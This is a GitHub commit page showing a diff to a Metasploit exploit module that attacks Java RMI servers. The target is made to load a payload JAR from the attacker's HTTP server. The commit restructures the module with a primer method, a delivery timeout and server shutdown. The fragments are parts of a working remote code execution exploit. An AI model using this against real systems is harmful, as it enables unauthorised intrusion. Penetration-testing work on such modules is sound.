Skip to content

Commit 73ce4cb

Browse files
jvazquez-r7jvazquez-r7
committed
Use primer
1 parent 0bcb99c commit 73ce4cb

File tree

1 file changed

+23
-12
lines changed

1 file changed

+23
-12
lines changed

modules/exploits/multi/misc/java_rmi_server.rb

Lines changed: 23 additions & 12 deletions
Original file line numberDiff line numberDiff line change
@@ -8,8 +8,8 @@
88
class Metasploit3 < Msf::Exploit::Remote
99
Rank = ExcellentRanking
1010

11-
include Msf::Exploit::Remote::HttpServer
1211
include Msf::Exploit::Remote::Tcp
12+
include Msf::Exploit::Remote::HttpServer
1313

1414
def initialize(info = {})
1515
super(update_info(info,
@@ -41,6 +41,10 @@ def initialize(info = {})
4141
'Privileged' => false,
4242
'Payload' => { 'BadChars' => '', 'DisableNops' => true },
4343
'Stance' => Msf::Exploit::Stance::Aggressive,
44+
'DefaultOptions' =>
45+
{
46+
'WfsDelay' => 10
47+
},
4448
'Targets' =>
4549
[
4650
[ 'Generic (Java Payload)',
@@ -76,14 +80,26 @@ def initialize(info = {})
7680
],
7781
'DefaultTarget' => 0
7882
))
79-
register_options( [ Opt::RPORT(1099) ], self.class)
83+
register_options([
84+
Opt::RPORT(1099),
85+
OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the payload request', 10]),
86+
], self.class)
8087

8188
register_autofilter_ports([ 1098, 1099 ])
8289
register_autofilter_services(%W{ rmi rmid java-rmi rmiregistry })
8390
end
8491

8592
def exploit
86-
start_service()
93+
begin
94+
Timeout.timeout(datastore['HTTPDELAY']) { super }
95+
rescue Timeout::Error
96+
# When the server stops due to our timeout, fail and
97+
# don't wait WfsDelay
98+
fail_with(Failure::Unknown, "The HTTP Server didn't get a payload requests")
99+
end
100+
end
101+
102+
def primer
87103
connect
88104

89105
jar = rand_text_alpha(rand(8)+1) + '.jar'
@@ -106,11 +122,13 @@ def exploit
106122
buf = ""
107123
1.upto(6) do
108124
res = sock.get_once(-1, 5) rescue nil
109-
break if not res
125+
break unless res
110126
break if session_created?
111127
buf << res
112128
end
113129

130+
disconnect
131+
114132
if buf =~ /RMI class loader disabled/
115133
fail_with(Failure::NotVulnerable, "The RMI class loader is disabled")
116134
end
@@ -120,14 +138,6 @@ def exploit
120138
end
121139

122140
print_good("Target #{rhost}:#{rport} may be exploitable...")
123-
124-
# Wait for the request to be handled
125-
1.upto(120) do
126-
break if session_created?
127-
select(nil, nil, nil, 0.25)
128-
handler()
129-
end
130-
131141
end
132142

133143
def on_request_uri(cli, request)
@@ -148,6 +158,7 @@ def on_request_uri(cli, request)
148158
})
149159

150160
print_status("Replied to request for payload JAR")
161+
stop_service
151162
end
152163
end
153164

0 commit comments

Comments
 (0)